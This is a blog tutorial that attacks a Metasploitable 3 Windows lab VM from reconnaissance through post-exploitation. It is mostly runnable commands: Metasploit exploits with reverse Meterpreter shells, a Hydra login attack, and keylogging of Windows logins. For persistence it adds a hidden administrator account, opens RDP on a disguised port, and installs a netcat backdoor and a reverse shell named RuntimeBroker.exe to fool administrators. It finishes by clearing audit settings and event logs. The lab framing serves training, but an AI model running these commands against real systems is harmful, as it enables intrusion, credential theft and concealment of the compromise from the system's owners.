How to Exploit Metasploitable 3 Windows Server VM and Conduct Post Exploitation

To conduct an effective penetration testing, proposing a framework and list the suitable tools and techniques under each phase and follow the framework is the best method because, during the penetration testing, it is easy to choose the best tool and technique for each phase. This guide shows the attack phase of the penetration testing. Attack phase has following phases. Those are reconnaissance, scanning, getting access, maintaining access and covering tracks.

How to Exploit Metasploitable 3 Windows Server VM and Conduct Post Exploitation

1. Intelligence gathering:

In this phase, a pen tester learns about how the target machine operates, behaves and information about the system such as running services, operating system and service versions using scanning tools like Nmap.
Running services and service version and operating system have been collected using Nmap

Type sudo nmap -sV -version-intensity 9 172.28.128.3

--version-intensity 9 is assigning value 9 for all probe packets, thus increases version detection for uncommon applications.

Nmap version detection

1.1 Find vulnerabilities using social engineering:

Once running services and versions are identified, pen tester can use:

Microsoft Security Response Center's security bulletins.

Microsoft security response center

Exploit database: It contains exploit code for the vulnerability. This exploit code can be executed directly from the terminal or executed from the Metasploit tool. To import to the Metasploit tool, ruby code file (exploit.rb) should be placed under the exploit folder in the Metasploit tool. Finally, we do need to reload the Metasploit by typing reload_all.

exploit database

CVE details website: It has listed multi vendors product's vulnerabilities.

cve details

SPLOITUS search engine: it will provide appropriate tools and exploits based on the keyword.

sploitus search engine

1.2 Vulnerability scanning:

In vulnerability scanning phase, the target system will be scanned with popular tools like Nessus, open vas, Nexpose. They keep the vulnerability database to detect the system vulnerabilities. OpenVAS has been used to find the vulnerabilities of the windows server 200.

openvas scan target and scan config

openvas vulnerabilities list

2.Exploitation

In this phase, the pen tester will exploit the vulnerability that existed in the system with the help of varieties of tools and techniques. Tools:- Metasploit framework, core impact, canvas, sqlmap, and using exploit code found in the exploit-db.com

2.1 Exploit Using Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability

Open terminal and Start PostgreSQL database by typing service PostgreSQL start. Initialize Metasploit framework by typing msfconsole. Find exploit by typing search cve:2017-0143.

Start PostgreSQL search cve:

Select suitable exploit by typing use and copy and paste it as shown below then press enter. Type show options command and press enter to display the required parameters to be set to successful exploitation.

show options

Set remote host by typing set rhost 172.28.128.3. Set localhost by typing set lhost 172.28.128.4 . Localhost is attacker pc that listens for inbound connection when reverse TCP shell payload is used. Type show payloads command to display all available payloads.

set rhost set lhost show payloads

Set suitable payload by typing set payload and copy and paste it as shown below. Note: the meterpreter shell has more options to control the compromised host. Reverse TCP is used instead of bind TCP because to bypass the firewall by asking the compromised host to initiate the TCP connection (outbound flow is allowed by the firewall by default). Finally type run command to start the exploitation process.

Successfully exploited and Meterpreter session is opened.

2.2 Exploit Using Elastic Search Code Execution Vulnerability

Initialize MSF console and type search cve:2014-3120. Select suitable exploit and type use exploit/multi/elasticsearch/script_mvel_rce and press enter Type show options.

Type the following commands Set rhost 172.28.128.3 Set lhost 172.28.128.4 Show payloads Set payload java/meterpreter/reverse_tcp run


2.3 Exploit Using Axis2 Default Administrator Password Vulnerability

The axis2 administrator account has the default password, it can be found in the vendor website otherwise Online dictionary attack can be launch.

To start dictionary attack type Hydra -s 8282 -v -V -L /home/subaharan/Desktop/us.txt -P /home/subaharan/Desktop/pass.txt 172.28.128.3 HTTP-post-form "/axis2/axis2 -admin/login:username=^USER^&password=^PASS^&submit=+Login+:Invalid auth credentials!" and press enter.

-s -service port, -V -verbose, -L- location of the username list file, -P -location of the password list file, 172.28.128.3 is the IP address of the target, HTTP-post-form - HTTP method that needs to be used, /axis2/axis2-admin -location of the HTTP login form. /login:username=^USER^&password=^PASS^ &submit=+Login+ - body of the HTTP post method. Invalid auth credentials! -error message.


Type search cve:2010-0219 Type use exploit/multi/http/axis2_deployer

search cve:2010-0219

Type set rhost 172.28.128.3 Type set lhost 172.28.128.4 Type set rport 8282 Type show payloads Type set payload java/meterpreter/reverse_tcp

set rhost 172.28.128.3

Type run

run

2.4 Exploit Using ManageEngine Desktop Central 9 Fileuploadservlet Connectionid Vulnerability

Type search cve:2015-8249 Type use exploit/windows/http/manageengine_connectionid_write Type show options

search cve:2015-8249

Type set rhost 172.28.128.3 Type set lhost 172.28.128.4 Type show payloads

set rhost 172.28.128.3

Type Set payload windows/meterpretor/reverse_tcp Type run

Set payload

2.5 Exploit Using Java JMX Server Insecure Configuration Java Code Execution

Type search:2015-2342 Type use exploit/multi/misc/java_jmx_server Type show options

search:2015-2342

Type set rhost 172.28.128.3 Type srvhost 172.28.128.4 Type set rport 1617 Type show payloads Type set payload java/meterpreter/reverse_tcp

set rhost 172.28.128.3

Type run

run

3. Maintaining access

In this phase penetration tester will keyloggers, backdoors, etc for later system access.
Tools- Netcat, Metasploit, Power spy

3.1 Enabling keylogger function to maintain access

Type ps to list the running process on the target.

ps
The executed code should be migrated from the SMB process to explorer process to capture the keystroke. type migrate 1132 to migrate to explorer process. Type getpid to verify Type keyscan_start to begin the capturing process Finally, The Keyscan_dump command should be given to extract the captured data.

migrated from the SMB process to explorer process

To capture the windows login username and password, the running code should be moved to winlogon.exe process. Type migrate 412 Type getpid to verify Type keyscan_start to start the capturing process. Type keyscan_dump to extract the captured data.

running code should be moved to winlogon.exe process

3.2 Create a new account to maintaining access.

Type shell to open the windows shell. Type net user /add suba suba12345 to create a new user account. Type netlocalgroup administrators suba /add to add the user Suba to administrators group so that user can have full power to execute any tasks

shell

Open the new terminal and type ssh -l suba 172.28.128.3 to access the target host via ssh. -l means username for ssh. 172.28.128.3 is the IP address of the target host.

access the target host via ssh

3.3 Create a hidden user account and enable remote desktop protocol for maintain access.

Type shell Type net user suba12 suba12345 /add Type net localgroup "Administrators" /add suba12 Type net localgroup "Users" /del suba12 to delete suba12 from Users group

delete suba12 from Users group

Type reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v suba12 /t REG_DWORD /d 0 /f to add the user suba12 to a special account list /v -name of the key /t -data type of the key /d -value of the key /f -add the registry key without prompting confirmation.

Type reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f to Hide the user name

Hide the user name

Type reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f to enable the remote desktop protocol.

Type reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\winstations\rdp-tcp" /v PortNumber /t REG_DWORD /d 0x4B2 /f to change from default tcp port to port 1202. So that administrators may think rdp is not running.

change from default tcp port to port 1202

Type netsh advfirewall firewall add rule name="Open Port 1202" dir=in action=allow protocol=TCP localport=1202 to Add a rule in the windows firewall to allow inbound connection to the new port 1202.

Add a rule in the windows firewall to allow inbound connection to the new port 1202.

Type net stop termservice to stop terminal service.

stop terminal service

Type net start termservice to start terminal service .

start terminal service

Finally, install Rdesktop utility by typing sudo apt install rdesktop .

install Rdesktop utility

Connect to the target by typing rdesktop -u suba12 172.28.128.3:1202 1202 is the new TCP port that RDP is listening .

Connect to the target by rdp

3.4 Upload Netcat as a backdoor for maintain access.

Meterpreter shell has file uploading ability based on the vulnerability. Type upload /home/subaharan/Desktop/netcat-win32-1.12/nc64.exe C:\\windows\\system32 The first argument is the location of the file that needs to be uploaded and second is the directory in the target.

Type reg enumkey -k HKLM\\SOFTWARE\\MICROSOFT\\CURRENTVERSION\\RUN to view the keys present in the above directory. These processes will start automatically during system booting.

view starting  automatically during system booting

Type reg setval -k HKLM\\Software\\Microsoft\\Windows\\Currentversion\\run -V nc -d "C:\Windows\System32\nc64.exe -ldp 455 -e cmd.exe" to make the netcat to automatically start during system startup. 445 is a port that netcat is listening for an inbound connection. -e allows executing the parameter with the full path to the netcat.

Type reg queryval -k HKLM\\Software\\Microsoft\\Windows\\Currentversion\\run to verify that the key has been added successfully.

automatically start during system startup

Type shell to access windows command shell. Type netsh advfirewall firewall add rule name=" open port 455" dir=in action =allow protocol=TCP localport=455 to allow inbound connection to TCP port 455. dir is the direction whether it's inbound or outbound

allow inbound connection to TCP port 455

Finally, open a new terminal and type nc -v 172.28.128.3 455 to connect to the target host and get shell access. 455 is the port that Netcat is listening. -v is to enable verbosely.

connect to the target host and get shell access

3.5 Install a persistent reverse tcp client for maintain access.

Type upload "home/subaharan/Desktop/RuntimeBroker.exe" c:\\windows to upload the Runtimebroker.exe file to the target. This is a reverse TCP shell client. RuntimeBroker name has been given to avoid detection from IT administrators.

Type shell to access windows shell prompt. Type reg add HKLM\software\microsoft\windows\currentversion\run /v RuntimeBroker /t REG_SZ /d "c:\windows\RuntimeBroker.exe" /f to add a registry key so that it will be start automatically during system reboot.

Type C:\windows\RuntimeBroker.exe to execute the reverse TCP shell client. This program is designed to send a TCP syn request to the reverse TCP shell server, if the server is not enabled then the program will stay sleep for the defined time and then again send a sync request to the server until the server is available.

upload the Runtimebroker.exe file to the target.

Type tasklist to list the running process on the remote target.

list the running process on the remote target.
task list

Open new terminal and type python '/home/subaharan/Desktop/Server-TCPReverse Shell.py' to run the reverse TCP shell server. Below figure shows that TCP syn request did come from the client and shell access has been established.

run the reverse TCP shell server

Metasploit can also be used as reverse TCP shell server. Type use exploit/multi/handler Type set lhost 172.28.128.4 to set the local host IP address Type set lport 4000 to listen to the server on TCP port 4000 Type set payload python/shell_reverse_tcp Type run

Metasploit multi handler

4 Cover tracks

In this phase, pentester will clear the evidence that created during hacking.
Tools- Auditpol, EventViewer, Metasploit

4.1 Clear windows logs from Meterpreter Shell

Type clearv to remove logging records.

remove logging records.

4.2 Turn off windows auditing for covering tracks

Type shell to access windows shell. Type auditpol /clear to stop the windows auditing.

stop the windows auditing.

Type auditpol /get /category:* to verify whether the auditing is stopped.

verify whether the auditing is stopped.

4.3 Clear windows logs from the windows shell for cover tracks

Issue shell command from Meterpreter shell to migrate to windows shell. Type wevtutil enum-logs to enumerate the events.

Meterpreter shell to migrate to windows shell

To clear the logs, type the following commands one by one Wevtutil clear-log application Wevtutil clear-log security Wevtutil clear-log setup Wevtutil clear-log system

To clear the windows logs
Subaharan

Subaharan Nithiyananthan is the founder of MobilePcBlog. He has First Class Bachelor of Engineering Honours in Computer Networks and Information Security. facebook twitter linkedin youtube

Previous Post Next Post